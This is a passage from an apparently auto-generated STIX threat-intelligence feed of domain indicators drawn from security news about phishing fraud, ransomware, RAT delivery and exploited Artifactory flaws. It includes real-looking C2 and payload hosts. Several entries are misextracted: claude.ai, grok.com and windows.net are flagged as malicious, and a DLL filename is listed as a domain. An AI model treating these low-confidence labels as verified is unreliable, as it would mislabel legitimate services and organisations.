'chatgpt.com']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a695fb79-6823-4e81-bebe-848dc64e79d4","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: claude.ai","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: started with a malicious Claude Artifact hosted on the real claude.ai domain. Since public Artifacts are meant for lightweight de","pattern":"[domain-name:value = 'claude.ai']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--100db197-7903-4525-9803-762013b74a8f","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: grok.com","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: : shared, indexable conversations hosted on chatgpt.com and grok.com that can rank for troubleshooting searches. Each of these s","pattern":"[domain-name:value = 'grok.com']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ccf361e-5939-48e4-bd8f-601e34e66294","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: domainlify.net","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: om Sender email address used to send campaign emails Domain domainlify[.]net Newly registered domain used in the Reply-To address Note","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8fd62077-442d-4da5-a269-1c4df9fddb67","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: eemusicclass.co.uk","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address contact@eemusicclass[.]co[.]uk Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4620733-2b0c-417c-877b-2d6d14b68942","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lifeones.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@lifeones[.]com Sender email address used to send campaign emails Domain","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b33c046b-7ade-496d-a9be-f4c1346b0821","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@lohnsteuerhilfe-aktuell-verein[.]de Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91859359-7d02-4acd-9f74-5e0487fa345e","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lumalisboa.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address no-reply@lumalisboa[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9694170-b159-494f-b380-2be0e41a3ec0","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mctci.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address noreply@mctci[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4fc79217-f437-4627-a41f-dc1fe3f6a2ef","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nuf.co.jp","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@nuf[.]co[.]jp Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--20e0b665-bb66-4a4c-a947-a9555538c115","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: service-nowinc.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: rs of compromise (IoCs):- Type Indicator Description Domain service-nowinc[.]com Domain impersonating ServiceNow Email address gomez@servi","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e6c5d38-0170-49ee-aa44-343d7a465c52","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: tivityhealth.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@tivityhealth[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a5fd32b-bf4f-4fb5-8535-44605395c108","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: tovimbatista.pt","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@tovimbatista[.]pt Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c678b37a-466b-4caa-adca-6c98945ab14b","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: uinsure.co.uk","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: associated with a bank account Email address notifications@uinsure[.]co[.]uk Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fdfc81f-cb3f-4d26-8653-447f919bfb57","created":"2026-09-11T12:14:12.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: apimantax.otax.fun","description":"Seen in \"New Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims\" (Cyber Security News). Context: bound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically retrieved","pattern":"[domain-name:value = 'apimantax.otax.fun']","pattern_type":"stix","valid_from":"2026-09-11T12:14:12.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--721df59b-b7bb-46f4-88a3-531293c087ee","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gitclone.org","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: xploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-42018/","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fa949a5-e76d-4db2-86a6-a59930c6cf17","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: backup-ubt.s3.us-east-1.amazonaws.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: ws[.]net/dpp1/hostfxr[.]dll SloppyRAT DLL URL URL hxxps[://]backup-ubt[.]s3[.]us-east-1[.]amazonaws[.]com/hostfxr[.]dll SloppyRAT DLL URL Domain stro7121.blo","pattern":"[domain-name:value = 'backup-ubt.s3.us-east-1.amazonaws.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aefd5991-55ef-4a96-b62e-5f24d8f7d9f0","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hostfxr.dll","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: L URL hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll SloppyRAT DLL URL URL hxxps[://]backup-ubt[.]s3[.]us-east","pattern":"[domain-name:value = 'hostfxr.dll']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ceac48a9-17dc-4f6a-8d4d-c92acefd76ac","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: linked4x.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: fffa67744812d73ad98eb config.py Python script Domain finger.linked4x[.]com ClickFix script domain Domain skipraid[.]com CastleLoader","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--035ec20c-06b4-4d82-8c19-9b9a7d5deed1","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: skipraid.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: Domain finger.linked4x[.]com ClickFix script domain Domain skipraid[.]com CastleLoader domain URL hxxps[://]skipraid[.]com/dsVGmQTr","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7dfd16ed-f7a8-487c-873c-f46eaf7746c5","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: stro7121.blob.core.windows.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: id[.]com/dsVGmQTrzX/default2 CastleLoader URL URL hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/config.py Python loader URL URL hxxps[://]stro","pattern":"[domain-name:value = 'stro7121.blob.core.windows.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c80a649f-5593-443b-a268-600b301eb296","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: telephoneip.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: ible; DLLMemLoader/1.0) Python loader User-Agent Domain api.telephoneip[.]net SloppyRAT C2 domain Domain api.truesmart[.]org SloppyRAT","pattern":"[domain-name:value = 'telephoneip.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8ba2cc37-eda6-4bd5-95be-fbf98166faab","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: truesmart.org","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: Domain api.telephoneip[.]net SloppyRAT C2 domain Domain api.truesmart[.]org SloppyRAT C2 domain Note: IP addresses and domains are in","pattern":"[domain-name:value = 'truesmart.org']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c827c1d0-4062-4b5a-bd4d-e17b5e6de4db","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: windows.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: m/hostfxr[.]dll SloppyRAT DLL URL Domain stro7121.blob.core.windows[.]net Python downloader C2 IP address 62.106.66[.]148:443 Slopp","pattern":"[domain-name:value = 'windows.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ab148f6a-b2fe-4e63-ad68-b7b0e3be236b","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gitclone.org","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: .184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--587f9a51-d5d0-4344-b454-dd08ab27f797","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: domainlify.net","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: t in the fake invoice as a contact address. Another domain, domainlify[.]net, was used in Reply-To fields. The short preparation perio","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b542b9b5-a06d-4e38-9e98-797ac038c4de","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: eemusicclass.co.uk","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: uerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--934c6f65-545a-4932-95e6-7b3a2b6b54a4","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lifeones.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address used to send out email","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1296cc41-7c5b-4f9d-8963-a8c08c8362d7","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: umalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk inf","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02837e36-d064-4e32-b81b-a59e9239b9e9","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lumalisboa.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhil","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e19940c5-5ab1-4000-a539-ee1adefa5f1d","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mctci.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: k info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--362c1272-b4cf-4f90-883f-e4275e26c84b","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nuf.co.jp","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: th[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbati","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--87200e0c-d486-4045-98b3-7b8a863ed236","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: service-nowinc.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: onsumer goods’ and others (Source : Microsoft). One domain, service-nowinc[.]com, was registered on July 31, shortly before the phishing a","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6bdc0b8b-23c0-45eb-8cc0-5b6cf72a8265","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: tivityhealth.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12850a38-14a8-4c68-a144-b69ba14c34e5","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: tovimbatista.pt","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d51ef4cf-3e5f-4c12-a780-30f6324a645e","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: uinsure.co.uk","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ss Email address associated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com norep","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6de8e6b-5601-4784-a53e-f6ea7b0494b6","created":"2026-09-11T07:14:09.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: noht1ng.top","description":"Seen in \"China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor\" (The Hacker News). Context: il.uaiubifas[.]top backdoor command server, port 443 Domain noht1ng[.]top hosted the exploit page IP 8.218.50[.]207 staging server,","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-11T07:14:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker 